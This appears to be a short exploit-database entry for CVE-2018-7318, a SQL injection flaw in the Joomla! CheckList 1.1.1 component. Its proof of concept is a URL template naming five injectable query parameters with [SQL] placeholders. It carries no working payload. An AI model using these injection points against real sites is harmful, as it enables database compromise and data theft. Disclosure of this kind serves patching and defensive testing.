Joomla! CheckList component version 1.1.1 suffers from a remote SQL injection vulnerability.
da40a67229d8a2554d96e24e8dd85c27
# # # #
# Exploit Title: Joomla! Component CheckList 1.1.1 - SQL Injection
# Dork: N/A
# Date: 22.02.2018
# Vendor Homepage: https://www.joomplace.com/
# Software Link: https://extensions.joomla.org/extensions/extension/living/personal-life/checklist/
# Version: 1.1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7318
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_checklist&view=frontend
# &title_search=[SQL]
# &tag_search=[SQL]
# &name_search=[SQL]
# &description_search=[SQL]
# &filter_order=[SQL]
#
# # # #